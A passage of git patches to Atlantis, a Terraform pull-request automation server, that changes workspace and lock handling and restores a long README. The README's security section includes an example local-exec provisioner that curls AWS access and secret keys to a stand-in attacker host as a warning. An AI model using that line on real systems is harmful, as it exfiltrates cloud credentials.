-		if err := os.RemoveAll(cloneDir); err != nil {
-			return "", errors.Wrap(err, "deleting old workspace")
-		}
+	// Otherwise we clone the repo.
+	return w.forceClone(log, cloneDir, headRepo, p)
+}
+
+func (w *FileWorkspace) forceClone(log *logging.SimpleLogger,
+	cloneDir string,
+	headRepo models.Repo,
+	p models.PullRequest) (string, error) {
+
+	err := os.RemoveAll(cloneDir)
+	if err != nil {
+		return "", errors.Wrapf(err, "deleting dir %q before cloning", cloneDir)
 	}
 
 	// Create the directory and parents if necessary.
@@ -124,8 +136,13 @@ func (w *FileWorkspace) Delete(r models.Repo, p models.PullRequest) error {
 	return os.RemoveAll(w.repoPullDir(r, p))
 }
 
+// Delete deletes the working dir for this workspace.
+func (w *FileWorkspace) DeleteForWorkspace(r models.Repo, p models.PullRequest, workspace string) error {
+	return os.RemoveAll(w.cloneDir(r, p, workspace))
+}
+
 func (w *FileWorkspace) repoPullDir(r models.Repo, p models.PullRequest) string {
-	return filepath.Join(w.DataDir, workspacePrefix, r.FullName, strconv.Itoa(p.Num))
+	return filepath.Join(w.DataDir, workingDirPrefix, r.FullName, strconv.Itoa(p.Num))
 }
 
 func (w *FileWorkspace) cloneDir(r models.Repo, p models.PullRequest, workspace string) string {
diff --git a/server/events/yaml/parser_validator.go b/server/events/yaml/parser_validator.go
index d53e6d7716..c8ad9ca096 100644
--- a/server/events/yaml/parser_validator.go
+++ b/server/events/yaml/parser_validator.go
@@ -20,9 +20,10 @@ type ParserValidator struct{}
 
 // ReadConfig returns the parsed and validated atlantis.yaml config for repoDir.
 // If there was no config file, then this can be detected by checking the type
-// of error: os.IsNotExist(error).
+// of error: os.IsNotExist(error) but it's instead preferred to check with
+// HasConfigFile.
 func (p *ParserValidator) ReadConfig(repoDir string) (valid.Config, error) {
-	configFile := filepath.Join(repoDir, AtlantisYAMLFilename)
+	configFile := p.configFilePath(repoDir)
 	configData, err := ioutil.ReadFile(configFile)
 
 	// NOTE: the error we return here must also be os.IsNotExist since that's
@@ -44,6 +45,21 @@ func (p *ParserValidator) ReadConfig(repoDir string) (valid.Config, error) {
 	return config, err
 }
 
+func (p *ParserValidator) HasConfigFile(repoDir string) (bool, error) {
+	_, err := os.Stat(p.configFilePath(repoDir))
+	if os.IsNotExist(err) {
+		return false, nil
+	}
+	if err == nil {
+		return true, nil
+	}
+	return false, err
+}
+
+func (p *ParserValidator) configFilePath(repoDir string) string {
+	return filepath.Join(repoDir, AtlantisYAMLFilename)
+}
+
 func (p *ParserValidator) parseAndValidate(configData []byte) (valid.Config, error) {
 	var rawConfig raw.Config
 	if err := yaml.UnmarshalStrict(configData, &rawConfig); err != nil {
diff --git a/server/events/yaml/parser_validator_test.go b/server/events/yaml/parser_validator_test.go
index a25f4cf2ab..43b5270631 100644
--- a/server/events/yaml/parser_validator_test.go
+++ b/server/events/yaml/parser_validator_test.go
@@ -16,6 +16,10 @@ func TestReadConfig_DirDoesNotExist(t *testing.T) {
 	r := yaml.ParserValidator{}
 	_, err := r.ReadConfig("/not/exist")
 	Assert(t, os.IsNotExist(err), "exp nil ptr")
+
+	exists, err := r.HasConfigFile("/not/exist")
+	Ok(t, err)
+	Equals(t, false, exists)
 }
 
 func TestReadConfig_FileDoesNotExist(t *testing.T) {
@@ -25,6 +29,10 @@ func TestReadConfig_FileDoesNotExist(t *testing.T) {
 	r := yaml.ParserValidator{}
 	_, err := r.ReadConfig(tmpDir)
 	Assert(t, os.IsNotExist(err), "exp nil ptr")
+
+	exists, err := r.HasConfigFile(tmpDir)
+	Ok(t, err)
+	Equals(t, false, exists)
 }
 
 func TestReadConfig_BadPermissions(t *testing.T) {
diff --git a/server/locks_controller.go b/server/locks_controller.go
index abeb490c05..140cb30460 100644
--- a/server/locks_controller.go
+++ b/server/locks_controller.go
@@ -7,6 +7,7 @@ import (
 	"strings"
 
 	"github.com/gorilla/mux"
+	"github.com/runatlantis/atlantis/server/events"
 	"github.com/runatlantis/atlantis/server/events/locking"
 	"github.com/runatlantis/atlantis/server/events/models"
 	"github.com/runatlantis/atlantis/server/events/vcs"
@@ -20,6 +21,8 @@ type LocksController struct {
 	Logger             *logging.SimpleLogger
 	VCSClient          vcs.ClientProxy
 	LockDetailTemplate TemplateWriter
+	WorkingDir         events.WorkingDir
+	WorkingDirLocker   events.WorkingDirLocker
 }
 
 // GetLock is the GET /locks/{id} route. It renders the lock detail view.
@@ -84,20 +87,29 @@ func (l *LocksController) DeleteLock(w http.ResponseWriter, r *http.Request) {
 		return
 	}
 
-	// Once the lock has been deleted, comment back on the pull request.
-	comment := fmt.Sprintf("**Warning**: The plan for dir: `%s` workspace: `%s` was **discarded** via the Atlantis UI.\n\n"+
-		"To `apply` you must run `plan` again.", lock.Project.Path, lock.Workspace)
 	// NOTE: Because BaseRepo was added to the PullRequest model later, previous
 	// installations of Atlantis will have locks in their DB that do not have
-	// this field on PullRequest. We skip commenting in this case.
+	// this field on PullRequest. We skip commenting and deleting the working dir in this case.
 	if lock.Pull.BaseRepo != (models.Repo{}) {
+		unlock, err := l.WorkingDirLocker.TryLock(lock.Pull.BaseRepo.FullName, lock.Workspace, lock.Pull.Num)
+		if err != nil {
+			l.Logger.Err("unable to obtain working dir lock when trying to delete old plans: %s", err)
+		} else {
+			defer unlock()
+			err = l.WorkingDir.DeleteForWorkspace(lock.Pull.BaseRepo, lock.Pull, lock.Workspace)
+			l.Logger.Err("unable to delete workspace: %s", err)
+		}
+
+		// Once the lock has been deleted, comment back on the pull request.
+		comment := fmt.Sprintf("**Warning**: The plan for dir: `%s` workspace: `%s` was **discarded** via the Atlantis UI.\n\n"+
+			"To `apply` you must run `plan` again.", lock.Project.Path, lock.Workspace)
 		err = l.VCSClient.CreateComment(lock.Pull.BaseRepo, lock.Pull.Num, comment)
 		if err != nil {
 			l.respond(w, logging.Error, http.StatusInternalServerError, "Failed commenting on pull request: %s", err)
 			return
 		}
 	} else {
-		l.Logger.Debug("skipping commenting on pull request that lock was deleted because BaseRepo field is empty")
+		l.Logger.Debug("skipping commenting on pull request and deleting workspace because BaseRepo field is empty")
 	}
 	l.respond(w, logging.Info, http.StatusOK, "Deleted lock id %q", id)
 }
diff --git a/server/locks_controller_test.go b/server/locks_controller_test.go
index fe26ba7cc4..c7d6c1fa2e 100644
--- a/server/locks_controller_test.go
+++ b/server/locks_controller_test.go
@@ -11,7 +11,9 @@ import (
 	"github.com/gorilla/mux"
 	. "github.com/petergtz/pegomock"
 	"github.com/runatlantis/atlantis/server"
+	"github.com/runatlantis/atlantis/server/events"
 	"github.com/runatlantis/atlantis/server/events/locking/mocks"
+	mocks2 "github.com/runatlantis/atlantis/server/events/mocks"
 	"github.com/runatlantis/atlantis/server/events/models"
 	vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks"
 	"github.com/runatlantis/atlantis/server/logging"
@@ -187,6 +189,8 @@ func TestDeleteLock_CommentFailed(t *testing.T) {
 	RegisterMockTestingT(t)
 
 	cp := vcsmocks.NewMockClientProxy()
+	workingDir := mocks2.NewMockWorkingDir()
+	workingDirLocker := events.NewDefaultWorkingDirLocker()
 	When(cp.CreateComment(AnyRepo(), AnyInt(), AnyString())).ThenReturn(errors.New("err"))
 	l := mocks.NewMockLocker()
 	When(l.Unlock("id")).ThenReturn(&models.ProjectLock{
@@ -195,9 +199,11 @@ func TestDeleteLock_CommentFailed(t *testing.T) {
 		},
 	}, nil)
 	lc := server.LocksController{
-		Locker:    l,
-		Logger:    logging.NewNoopLogger(),
-		VCSClient: cp,
+		Locker:           l,
+		Logger:           logging.NewNoopLogger(),
+		VCSClient:        cp,
+		WorkingDir:       workingDir,
+		WorkingDirLocker: workingDirLocker,
 	}
 	req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
 	req = mux.SetURLVars(req, map[string]string{"id": "id"})
@@ -212,6 +218,8 @@ func TestDeleteLock_CommentSuccess(t *testing.T) {
 
 	cp := vcsmocks.NewMockClientProxy()
 	l := mocks.NewMockLocker()
+	workingDir := mocks2.NewMockWorkingDir()
+	workingDirLocker := events.NewDefaultWorkingDirLocker()
 	pull := models.PullRequest{
 		BaseRepo: models.Repo{FullName: "owner/repo"},
 	}
@@ -224,9 +232,11 @@ func TestDeleteLock_CommentSuccess(t *testing.T) {
 		},
 	}, nil)
 	lc := server.LocksController{
-		Locker:    l,
-		Logger:    logging.NewNoopLogger(),
-		VCSClient: cp,
+		Locker:           l,
+		Logger:           logging.NewNoopLogger(),
+		VCSClient:        cp,
+		WorkingDirLocker: workingDirLocker,
+		WorkingDir:       workingDir,
 	}
 	req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
 	req = mux.SetURLVars(req, map[string]string{"id": "id"})
@@ -236,4 +246,5 @@ func TestDeleteLock_CommentSuccess(t *testing.T) {
 	cp.VerifyWasCalled(Once()).CreateComment(pull.BaseRepo, pull.Num,
 		"**Warning**: The plan for dir: `path` workspace: `workspace` was **discarded** via the Atlantis UI.\n\n"+
 			"To `apply` you must run `plan` again.")
+	workingDir.VerifyWasCalledOnce().DeleteForWorkspace(pull.BaseRepo, pull, "workspace")
 }
diff --git a/server/server.go b/server/server.go
index 7adafb8a95..7eaceb7e23 100644
--- a/server/server.go
+++ b/server/server.go
@@ -275,6 +275,8 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 		Logger:             logger,
 		VCSClient:          vcsClient,
 		LockDetailTemplate: lockTemplate,
+		WorkingDir:         workingDir,
+		WorkingDirLocker:   workingDirLocker,
 	}
 	eventsController := &EventsController{
 		CommandRunner:                commandRunner,
diff --git a/testing/temp_files.go b/testing/temp_files.go
index 1bfd0f15f4..7a242010f2 100644
--- a/testing/temp_files.go
+++ b/testing/temp_files.go
@@ -3,6 +3,7 @@ package testing
 import (
 	"io/ioutil"
 	"os"
+	"path/filepath"
 	"testing"
 )
 
@@ -17,3 +18,26 @@ func TempDir(t *testing.T) (string, func()) {
 		os.RemoveAll(tmpDir) // nolint: errcheck
 	}
 }
+func DirStructure(t *testing.T, structure map[string]interface{}) (string, func()) {
+	tmpDir, cleanup := TempDir(t)
+	dirStructureGo(t, tmpDir, structure)
+	return tmpDir, cleanup
+}
+
+func dirStructureGo(t *testing.T, parentDir string, structure map[string]interface{}) {
+	for key, val := range structure {
+		// If val is nil then key is a filename and we just create it
+		if val == nil {
+			_, err := os.Create(filepath.Join(parentDir, key))
+			Ok(t, err)
+			continue
+		}
+		// If val is another map then key is a dir
+		if dirContents, ok := val.(map[string]interface{}); ok {
+			subDir := filepath.Join(parentDir, key)
+			Ok(t, os.Mkdir(subDir, 0700))
+			// Recurse and create contents.
+			dirStructureGo(t, subDir, dirContents)
+		}
+	}
+}

From 573491fd3f0f6f1e776d298571bca4588bb05a4e Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Tue, 3 Jul 2018 13:34:12 +0200
Subject: [PATCH 69/69] Bring README back for now

---
 README.md | 795 +++++++++++++++++++++++++++++++++++++++++++++++++++++-
 1 file changed, 789 insertions(+), 6 deletions(-)

diff --git a/README.md b/README.md
index 7d669fa1ab..09ddd4f0c2 100644
--- a/README.md
+++ b/README.md
@@ -1,12 +1,12 @@
 # Atlantis
 
 <p align="center">
-  <img src="./runatlantis.io/.vuepress/public/hero.png" alt="Atlantis Logo"/><br><br>
-  Terraform Automation By Pull Request
+  <img src="./docs/atlantis-logo.png" alt="Atlantis Logo"/><br><br>
+  A unified workflow for collaborating on Terraform through GitHub and GitLab
 </p>
 
 ## Walkthrough Video
-[![Atlantis Walkthrough](./runatlantis.io/guide/images/atlantis-walkthrough-icon.png)](https://www.youtube.com/watch?v=TmIPWda0IKg)
+[![Atlantis Walkthrough](./docs/atlantis-walkthrough-icon.png)](https://www.youtube.com/watch?v=TmIPWda0IKg)
 
 Read about [Why We Built Atlantis](https://medium.com/runatlantis/introducing-atlantis-6570d6de7281)
 
@@ -15,11 +15,794 @@ Read about [Why We Built Atlantis](https://medium.com/runatlantis/introducing-at
 [![Slack Status](https://thawing-headland-22460.herokuapp.com/badge.svg)](https://thawing-headland-22460.herokuapp.com)
 [![Go Report Card](https://goreportcard.com/badge/github.com/runatlantis/atlantis)](https://goreportcard.com/report/github.com/runatlantis/atlantis)
 
+* [Features](#features)
+* [Atlantis Works With](#atlantis-works-with)
+* [Getting Started](#getting-started)
+* [Pull/Merge Request Commands](#pullmerge-request-commands)
+* [Project Structure](#project-structure)
+* [Workspaces/Environments](#workspacesenvironments)
+* [Terraform Versions](#terraform-versions)
+* [Project-Specific Customization](#project-specific-customization)
+* [Locking](#locking)
+* [Approvals](#approvals)
+* [Security](#security)
+* [Production-Ready Deployment](#production-ready-deployment)
+    * [Docker](#docker)
+    * [Kubernetes](#kubernetes)
+    * [AWS Fargate](#aws-fargate)
+* [Server Configuration](#server-configuration)
+* [AWS Credentials](#aws-credentials)
+* [Glossary](#glossary)
+    * [Project](#project)
+    * [Workspace/Environment](#workspaceenvironment)
+* [FAQ](#faq)
+* [Contributing](#contributing)
+* [Credits](#credits)
+
+## Features
+➜ Collaborate on Terraform with your team
+- Run terraform `plan` and `apply` **from GitHub pull requests** so everyone can review the output
+- **Lock workspaces** until pull requests are merged to prevent concurrent modification and confusion
+
+➜ Developers can write Terraform safely
+- **No need to distribute AWS credentials** to your whole team. Developers can submit Terraform changes and run `plan` and `apply` directly from the pull/merge request
+- Optionally, require a **review and approval** prior to running `apply`
+
+➜ Also
+- Support **multiple versions of Terraform** with a simple project config file
+
+## Atlantis Works With
+* GitHub (public, private or enterprise) and GitLab (public, private or enterprise)
+* Any Terraform version (see [Terraform Versions](#terraform-version))
+* Can be run with a [single binary](https://github.com/runatlantis/atlantis/releases) or with our [Docker image](https://hub.docker.com/r/runatlantis/atlantis/)
+* Any repository structure
+
 ## Getting Started
-[www.runatlantis.io/guide](https://www.runatlantis.io/guide)
+Download from [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases)
+
+Run
+```
+./atlantis testdrive
+```
+This mode sets up Atlantis on a test repo so you can try it out. It will
+- fork an example terraform project
+- install terraform (if not already in your PATH)
+- install ngrok so we can expose Atlantis to GitHub
+- start Atlantis
+
+If you're ready to permanently set up Atlantis see [Production-Ready Deployment](#production-ready-deployment).
+
+## Pull/Merge Request Commands
+Atlantis currently supports three commands that can be run via pull request comments (or merge request comments on GitLab):
+
+![Help Command](./docs/pr-comment-help.png)
+#### `atlantis help`
+View help
+
+---
+![Plan Command](./docs/pr-comment-plan.png)
+#### `atlantis plan [options] -- [terraform plan flags]`
+Runs `terraform plan` for the changes in this pull request.
+
+Options:
+* `-d directory` Which directory to run plan in relative to root of repo. Use `.` for root. If not specified, will attempt to run plan for all Terraform projects we think were modified in this changeset.
+* `-w workspace` Switch to this [Terraform workspace](https://www.terraform.io/docs/state/workspaces.html) before planning. Defaults to `default`. If not using Terraform workspaces you can ignore this.
+* `--verbose` Append Atlantis log to comment.
+
+Additional Terraform flags:
+
+If you need to run `terraform plan` with additional arguments, like `-target=resource` or `-var 'foo-bar'`
+you can append them to the end of the comment after `--`, ex.
+```
+atlantis plan -d dir -- -var 'foo=bar'
+```
+If you always need to append a certain flag, see [Project-Specific Customization](#project-specific-customization).
+
+---
+![Apply Command](./docs/pr-comment-apply.png)
+#### `atlantis apply [options] -- [terraform apply flags]`
+Runs `terraform apply` for the plans that match the directory and workspace.
+
+Options:
+* `-d directory` Apply the plan for this directory, relative to root of repo. Use `.` for root. If not specified, will run apply against all plans created for this workspace.
+* `-w workspace` Apply the plan for this [Terraform workspace](https://www.terraform.io/docs/state/workspaces.html). Defaults to `default`. If not using Terraform workspaces you can ignore this.
+* `--verbose` Append Atlantis log to comment.
+
+Additional Terraform flags:
+
+Same as with `atlantis plan`.
+
+## Project Structure
+Atlantis supports several Terraform project structures:
+- a single Terraform project at the repo root
+```
+.
+├── main.tf
+└── ...
+```
+-  multiple project folders in a single repo (monorepo)
+```
+.
+├── project1
+│   ├── main.tf
+|   └── ...
+└── project2
+    ├── main.tf
+    └── ...
+```
+-  one folder per set of configuration
+```
+.
+├── staging
+│   ├── main.tf
+|   └── ...
+└── production
+    ├── main.tf
+    └── ...
+```
+-  using `env/{env}.tfvars` to define workspace specific variables. This works in both multi-project repos and single-project repos.
+```
+.
+├── env
+│   ├── production.tfvars
+│   └── staging.tfvars
+└── main.tf
+```
+or
+```
+.
+├── project1
+│   ├── env
+│   │   ├── production.tfvars
+│   │   └── staging.tfvars
+│   └── main.tf
+└── project2
+    ├── env
+    │   ├── production.tfvars
+    │   └── staging.tfvars
+    └── main.tf
+```
+With the above project structure you can de-duplicate your Terraform code between workspaces/environments without requiring extensive use of modules. At Hootsuite we found this project format to be very successful and use it in all of our 100+ Terraform repositories.
+
+## Workspaces/Environments
+Terraform introduced [Workspaces](https://www.terraform.io/docs/state/workspaces.html) in 0.9. They allow for
+> a single directory of Terraform configuration to be used to manage multiple distinct sets of infrastructure resources
+
+If you're using a Terraform version >= 0.9.0, Atlantis supports workspaces through the `-w` flag.
+For example,
+```
+atlantis plan -w staging
+```
+
+If a workspace is specified, Atlantis will use `terraform workspace select {workspace}` prior to running `terraform plan` or `terraform apply`.
+
+If you're using the `env/{env}.tfvars` [project structure](#project-structure) we will also append `-var-file=env/{env}.tfvars` to `plan` and `apply`.
+
+If no workspace is specified, we'll use the `default` workspace by default.
+This replicates Terraform's default behaviour which also uses the `default` workspace.
+
+## Terraform Versions
+By default, Atlantis will use the `terraform` executable that is in its path. To use a specific version of Terraform just install that version on the server that Atlantis is running on.
+
+If you would like to use a different version of Terraform for some projects but not for others
+1. Install the desired version of Terraform into the `$PATH` of where Atlantis is running and name it `terraform{version}`, ex. `terraform0.8.8`.
+2. In the project root (which is not necessarily the repo root) of any project that needs a specific version, create an `atlantis.yaml` file as follows
+```
+---
+terraform_version: 0.8.8 # set to desired version
+```
+
+So your project structure will look like
+```
+.
+├── main.tf
+└── atlantis.yaml
+```
+Now when Atlantis executes it will use the `terraform{version}` executable.
+
+## Project-Specific Customization
+An `atlantis.yaml` config file in your project root (which is not necessarily the repo root) can be used to customize
+- what commands Atlantis runs **before** `init`, `get`, `plan` and `apply` with `pre_init`, `pre_get`, `pre_plan` and `pre_apply`
+- what commands Atlantis runs **after** `plan` and `apply` with `post_plan` and `post_apply`
+- additional arguments to be supplied to specific terraform commands with `extra_arguments`
+    - the commmands that we support adding extra args to are `init`, `get`, `plan` and `apply`
+- what version of Terraform to use (see [Terraform Versions](#terraform-versions))
+
+The schema of the `atlantis.yaml` project config file is
+
+```yaml
+# atlantis.yaml
+---
+terraform_version: 0.8.8 # optional version
+# pre_init commands are run when the Terraform version is >= 0.9.0
+pre_init:
+  commands:
+  - "curl http://example.com"
+# pre_get commands are run when the Terraform version is < 0.9.0
+pre_get:
+  commands:
+  - "curl http://example.com"
+pre_plan:
+  commands:
+  - "curl http://example.com"
+post_plan:
+  commands:
+  - "curl http://example.com"
+pre_apply:
+  commands:
+  - "curl http://example.com"
+post_apply:
+  commands:
+  - "curl http://example.com"
+extra_arguments:
+  - command_name: plan
+    arguments:
+    - "-var-file=terraform.tfvars"
+```
+
+When running the `pre_plan`, `post_plan`, `pre_apply`, and `post_apply` commands the following environment variables are available
+- `WORKSPACE`: if a workspace argument is supplied to `atlantis plan` or `atlantis apply`, ex `atlantis plan -w staging`, this will
+be the value of that argument. Else it will be `default`
+- `ATLANTIS_TERRAFORM_VERSION`: local version of `terraform` or the version from `terraform_version` if specified, ex. `0.8.8`
+- `DIR`: absolute path to the root of the project on disk
+
+## Locking
+When `plan` is run, the [project](#project) and [workspace](#workspaceenvironment) (**but not the whole repo**) are **Locked** until an `apply` succeeds **and** the pull request/merge request is merged.
+This protects against concurrent modifications to the same set of infrastructure and prevents
+users from seeing a `plan` that will be invalid if another pull request is merged.
+
+If you have multiple directories inside a single repository, only the directory will be locked. Not the whole repo.
+
+To unlock the project and workspace without completing an `apply` and merging, click the link
+at the bottom of the plan comment to discard the plan and delete the lock.
+Once a plan is discarded, you'll need to run `plan` again prior to running `apply` when you go back to that pull request.
+
+## Approvals
+If you'd like to require pull/merge requests to be approved prior to a user running `atlantis apply` simply run Atlantis with the `--require-approval` flag.
+By default, no approval is required.
+
+Please note that this option is not intended for access control purposes: anyone with even read access to a repository can approve a pull request.
+
+For more information on GitHub pull request reviews and approvals see: https://help.github.com/articles/about-pull-request-reviews/
+
+For more information on GitLab merge request reviews and approvals (only supported on GitLab Enterprise) see: https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html.
+
+## Security
+Because you usually run Atlantis on a server with credentials that allow access to your infrastructure it's important that you deploy Atlantis securely.
+
+Atlantis could be exploited by
+* Running `terraform apply` on a malicious Terraform file with [local-exec](https://www.terraform.io/docs/provisioners/local-exec.html)
+```tf
+resource "null_resource" "null" {
+  provisioner "local-exec" {
+    command = "curl https://cred-stealer.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
+  }
+}
+```
+* Running malicious hook commands specified in an `atlantis.yaml` file.
+* Someone adding `atlantis plan/apply` comments on your valid pull requests causing terraform to run when you don't want it to.
+
+### Mitigations
+#### Don't Use On Public Repos
+Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos until Atlantis gets an authentication system.
+
+#### Don't Use `--allow-fork-prs`
+If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false)
+because anyone can open up a pull request from their fork to your repo.
+
+#### `--repo-whitelist`
+Atlantis requires you to specify a whitelist of repositories it will accept webhooks from via the `--repo-whitelist` flag.
+For example:
+* Specific repositories: `--repo-whitelist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests`
+* Your whole organization: `--repo-whitelist=github.com/runatlantis/*`
+* Every repository in your GitHub Enterprise install: `--repo-whitelist=github.yourcompany.com/*`
+* All repositories: `--repo-whitelist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret.
+
+This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details.
+
+#### Webhook Secrets
+Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables.
+Even with the `--repo-whitelist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is whitelisted.
+Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab).
+
+## Production-Ready Deployment
+### Install Terraform
+`terraform` needs to be in the `$PATH` for Atlantis.
+Download from https://www.terraform.io/downloads.html
+```
+unzip path/to/terraform_*.zip -d /usr/local/bin
+```
+Check that it's in your `$PATH`
+```
+$ terraform version
+Terraform v0.10.0
+```
+If you want to use a different version of Terraform see [Terraform Versions](#terraform-versions)
+
+### Hosting Atlantis
+Atlantis needs to be hosted somewhere that github.com/gitlab.com or your GitHub/GitLab Enterprise installation can reach. Developers in your organization also need to be able to access Atlantis to view the UI and to delete locks.
+
+By default Atlantis runs on port `4141`. This can be changed with the `--port` flag.
+
+### Add GitHub Webhook
+Once you've decided where to host Atlantis you can add it as a Webhook to GitHub.
+If you already have a GitHub organization we recommend installing the webhook at the **organization level** rather than on each repository, however both methods will work.
+
+> If you're not sure if you have a GitHub organization see https://help.github.com/articles/differences-between-user-and-organization-accounts/
+
+If you're installing on the organization, navigate to your organization's page and click **Settings**.
+If installing on a single repository, navigate to the repository home page and click **Settings**.
+- Select **Webhooks** or **Hooks** in the sidebar
+- Click **Add webhook**
+- set **Payload URL** to `http://$URL/events` where `$URL` is where Atlantis is hosted. **Be sure to add `/events`**
+- set **Content type** to `application/json`
+- set **Secret** to a random key (https://www.random.org/strings/). You'll need to pass this value to the `--gh-webhook-secret` option when you start Atlantis
+- select **Let me select individual events**
+- check the boxes
+	- **Pull request reviews**
+	- **Pushes**
+	- **Issue comments**
+	- **Pull requests**
+- leave **Active** checked
+- click **Add webhook**
+
+### Add GitLab Webhook
+If you're using GitLab, navigate to your project's home page in GitLab
+- Click **Settings > Integrations** in the sidebar
+- set **URL** to `http://$URL/events` where `$URL` is where Atlantis is hosted. **Be sure to add `/events`**
+- leave **Secret Token** blank or set this to a random key (https://www.random.org/strings/). If you set it, you'll need to use the `--gitlab-webhook-secret` option when you start Atlantis
+- check the boxes
+    - **Push events**
+    - **Comments**
+    - **Merge Request events**
+- leave **Enable SSL verification** checked
+- click **Add webhook**
+
+### Create a GitHub Token
+We recommend creating a new user in GitHub named **atlantis** that performs all API actions, however you can use any user.
+
+**NOTE: The Atlantis user must have "Write permissions" (for repos in an organization) or be a "Collaborator" (for repos in a user account) to be able to set commit statuses:**
+![Atlantis status](./docs/status.png)
+
+Once you've created the user (or have decided to use an existing user) you need to create a personal access token.
+- follow [https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/#creating-a-token](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/#creating-a-token)
+- copy the access token
+
+### Create a GitLab Token
+We recommend creating a new user in GitLab named **atlantis** that performs all API actions, however you can use any user.
+Once you've created the user (or have decided to use an existing user) you need to create a personal access token.
+- follow [https://docs.gitlab.com/ce/user/profile/personal_access_tokens.html#creating-a-personal-access-token](https://docs.gitlab.com/ce/user/profile/personal_access_tokens.html#creating-a-personal-access-token)
+- create a token with **api** scope
+- copy the access token
+
+### Start Atlantis
+Now you're ready to start Atlantis!
+
+If you're using GitHub, run:
+```
+$ atlantis server --atlantis-url $URL --gh-user $USERNAME --gh-token $TOKEN --gh-webhook-secret $SECRET
+2049/10/6 00:00:00 [WARN] server: Atlantis started - listening on port 4141
+```
+
+If you're using GitHub Enterprise, run:
+```
+$ atlantis server --atlantis-url $URL --gh-user $USERNAME --gh-token $TOKEN --gh-webhook-secret $SECRET --gh-hostname $GITHUBHOSTNAME
+2049/10/6 00:00:00 [WARN] server: Atlantis started - listening on port 4141
+```
+
+If you're using GitLab, run:
+```
+$ atlantis server --atlantis-url $URL --gitlab-user $USERNAME --gitlab-token $TOKEN --gitlab-webhook-secret $SECRET
+2049/10/6 00:00:00 [WARN] server: Atlantis started - listening on port 4141
+```
+
+- `$URL` is the URL that Atlantis can be reached at
+- `$USERNAME` is the GitHub/GitLab username you generated the token for
+- `$TOKEN` is the access token you created. If you don't want this to be passed in as an argument for security reasons you can specify it in a config file (see [Configuration](#configuration)) or as an environment variable: `ATLANTIS_GH_TOKEN` or `ATLANTIS_GITLAB_TOKEN`
+- `$SECRET` is the random key you used for the webhook secret. If you left the secret blank then don't specify this flag. If you don't want this to be passed in as an argument for security reasons you can specify it in a config file (see [Configuration](#configuration)) or as an environment variable: `ATLANTIS_GH_WEBHOOK_SECRET` or `ATLANTIS_GITLAB_WEBHOOK_SECRET`
+- `$GITHUBHOSTNAME` is the FQDN of your enterprise Github, for example `github.mycompany.com` (adding protocol before the FQDN is unnecessary, it will always use https). If you want to set it as an environment variable then use `ATLANTIS_GH_HOSTNAME`.
+
+Atlantis is now running!
+**We recommend running it under something like Systemd or Supervisord.**
+
+### Docker
+Atlantis also ships inside a docker image. Run the docker image:
+
+```bash
+docker run runatlantis/atlantis:latest server <required options>
+```
+
+#### Usage
+If you need to modify the Docker image that we provide, for instance to add a specific version of Terraform, you can do something like this:
+
+* Create a custom docker file
+```bash
+vim Dockerfile-custom
+```
+
+```dockerfile
+FROM runatlantis/atlantis
+
+# copy a terraform binary of the version you need
+COPY terraform /usr/local/bin/terraform
+```
+
+* Build docker image
+
+```bash
+docker build -t {YOUR_DOCKER_ORG}/atlantis-custom -f Dockerfile-custom .
+```
+
+* Run docker image
+
+```bash
+docker run {YOUR_DOCKER_ORG}/atlantis-custom server --gh-user=GITHUB_USERNAME --gh-token=GITHUB_TOKEN
+```
+
+### Kubernetes
+Atlantis can be deployed into Kubernetes as a
+[Deployment](https://kubernetes.io/docs/concepts/workloads/controllers/deployment/)
+or as a [Statefulset](https://kubernetes.io/docs/concepts/workloads/controllers/statefulset/) with persistent storage.
+
+StatefulSet is recommended because Atlantis stores its data on disk and so if your Pod dies
+or you upgrade Atlantis, you won't lose the data. On the other hand, the only data that
+Atlantis has right now is any plans that haven't been applied and Atlantis locks. If
+Atlantis loses that data, you just need to run `atlantis plan` again so it's not the end of the world.
+
+Regardless of whether you choose a Deployment or StatefulSet, first create a Secret with the webhook secret and access token:
+```
+echo -n "yourtoken" > token
+echo -n "yoursecret" > webhook-secret
+kubectl create secret generic atlantis-vcs --from-file=token --from-file=webhook-secret
+```
+
+Next, edit the manifests below as follows:
+1. Replace `<VERSION>` in `image: runatlantis/atlantis:<VERSION>` with the most recent version from https://github.com/runatlantis/atlantis/releases/latest.
+    * NOTE: You never want to run with `:latest` because if your Pod moves to a new node, Kubernetes will pull the latest image and you might end
+up upgrading Atlantis by accident!
+2. Replace `value: github.com/yourorg/*` under `name: ATLANTIS_REPO_WHITELIST` with the whitelist pattern
+for your Terraform repos. See [--repo-whitelist](#--repo-whitelist) for more details.
+3. If you're using GitHub:
+    1. Replace `<YOUR_GITHUB_USER>` with the username of your Atlantis GitHub user without the `@`.
+    2. Delete all the `ATLANTIS_GITLAB_*` environment variables.
+4. If you're using GitLab:
+    1. Replace `<YOUR_GITLAB_USER>` with the username of your Atlantis GitLab user without the `@`.
+    2. Delete all the `ATLANTIS_GH_*` environment variables.
+
+#### StatefulSet Manifest
+<details>
+ <summary>Expand...</summary>
+
+```yaml
+apiVersion: apps/v1
+kind: StatefulSet
+metadata:
+  name: atlantis
+spec:
+  serviceName: atlantis
+  replicas: 1
+  updateStrategy:
+    type: RollingUpdate
+    rollingUpdate:
+      partition: 0
+  selector:
+    matchLabels:
+      app: atlantis
+  template:
+    metadata:
+      labels:
+        app: atlantis
+    spec:
+      securityContext:
